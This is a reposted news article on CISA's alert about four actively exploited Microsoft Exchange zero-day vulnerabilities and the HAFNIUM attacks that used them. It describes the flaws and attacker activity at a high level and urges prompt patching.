CISA Urges Patch, as Hackers Exploit Zero-Day Flaws in Microsoft Exchange - HealthITSecurity.com

sutitong.blogspot.com

By Jessica Davis

March 03, 2021 - The Department of Homeland Security Cybersecurity and Infrastructure Agency alerted to a new out-of-band software update issued by Microsoft, which will patch four zero-day vulnerabilities found in its Exchange servers, already under active exploit in the wild.

The flaws are found in Microsoft Exchange Servers versions 2013, 2016, and 2019. CISA warns that an attacker can exploit three remote code execution flaws to take control of an impacted system.

Meanwhile, an exploit of the CVE-2021-26855 flaw will give the attacker access to the victim’s information.

Microsoft issued its own alert “to emphasize the critical nature of these vulnerabilities and the importance of patching all affected systems immediately to protect against these exploits and prevent future abuse across the ecosystem.”

The CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in that enables an attacker to send arbitrary HTTP requests and authenticate as the Exchange server. 

READ MORE: NIST Shares Risk-Based Guide to Information Exchange Security

The second flaw, CVE-2021-26857, is an insecure deserialization vulnerability found in the Unified Messaging service, which refers to the deserialization of untrusted user-controllable data by a program. 

CVE-2021-26858 is a post-authentication arbitrary file write vulnerability in the Exchange server. If an attacker can authenticate with the server, the flaw can be used to write a file to any path on the server.

Lastly, CVE-2021-27065 is a post-authentication arbitrary file write flaw that can allow an authenticated hacker to write any file to any path on the server. If an attacker exploits the SSRF flaw, they could authenticate on the network. The flaw can also be exploited if an attacker obtains legitimate admin credentials.

The flaws were found by Volexity researchers who detected anomalous activity on the Microsoft Exchange servers of two clients. An analysis of the suspicious activity showed a large amount of data being sent to IP addresses not tied to legitimate results.

Further analysis of the IIS logs revealed inbound POST requests to valid files associated with images, JavaScript, cascading style sheets, and fonts used by Outlook Web Access (OWA).

READ MORE: Phishing Campaigns Targeting Office 365 Credentials, Spoofing Exchange

“It was initially suspected the servers might be backdoored and that webshells were being executed through a malicious HTTP module or ISAPI filter,” researchers explained. 

The team launched incident response processes and initiated a forensics investigation that determined hackers were exploiting a zero-day server flaw: SSRF. The attackers used the exploit to steal the full contents of several user mailboxes.

The vulnerabilities are remotely exploitable and do not require authentication of any kind. What’s more, the attacker does not need special knowledge or access to exploit the targeted environment.

The hacker only needs to know the server is running Exchange and the account from which they want to extract the emails, in order to exploit the vulnerabilities.

“Exploiting this vulnerability gave [the attacker] the ability to run code as SYSTEM on the Exchange server,” Microsoft noted. “This requires administrator permission or another vulnerability to exploit.”

READ MORE: 61% Microsoft Exchange Servers Are Unpatched, Vulnerable to Attack

A further analysis from Volexity determined the attacker also managed to chain the SSRF flaw with one of the other Exchange vulnerabilities that allowed for remote code execution on the targeted servers.

In all remote code execution attacks on these flaws, the researchers observed hackers writing webshalls (ASPX files) to disk and conducting a host of other nefarious activities, including dumping credentials, adding user accounts, and stealing copies of the Active Directory database (NTDS.DIT).

The hackers also used these exploits to move laterally to connected systems and environments on the victims’ networks.

According to Microsoft, the Chinese nation-state hacking group HAFNIUM is actively exploiting these flaws against on-premise servers in limited and targeted attacks. HAFNIUM operates primarily from leased virtual private servers (VPS) in the US.

The hacking group primarily targets US entities across a range of industries, such as infectious disease researchers, law firms, higher education institutions, and defense contractors, among others.

In the past, HAFNIUM compromised a host of victims by exploiting flaws in internet-facing servers. The group has also used legitimate open-source frameworks for command and control. In all cases, HAFNIUM exfiltrated data to file sharing sites like MEGA, upon successful exploits.

In previous exploits not tied to the current Exchange campaign, the attackers interacted with victim Office 365 tenants. Though the compromises were unsuccessful, the reconnaissance activities allow the attacks to identify further details about the targeted environments.

All customers are being urged to immediately update on-premise servers. Online Exchange servers are not impacted by these vulnerabilities or attacks.

Patching of these flaws is critical for the healthcare sector, given the rise in the demand and sale of backdoor access to healthcare networks. Groups of threat actors, including Initial Access Brokers (IABs), scan for known flaws and other exposed endpoints to gain a foothold onto the network. That access is then sold online to the highest bidder.

Despite these risks, previous data revealed that at least 61 percent of Microsoft Exchange servers remain unpatched. Effective and prompt patch management is crucial for preventing long-term, detected intrusions.

Let's block ads! (Why?)

"exchange" - Google News
March 03, 2021 at 09:54PM
https://ift.tt/309BDFI

CISA Urges Patch, as Hackers Exploit Zero-Day Flaws in Microsoft Exchange - HealthITSecurity.com
"exchange" - Google News
https://ift.tt/3c55nbe
https://ift.tt/3b2gZKy
Exchange

Bagikan Berita Ini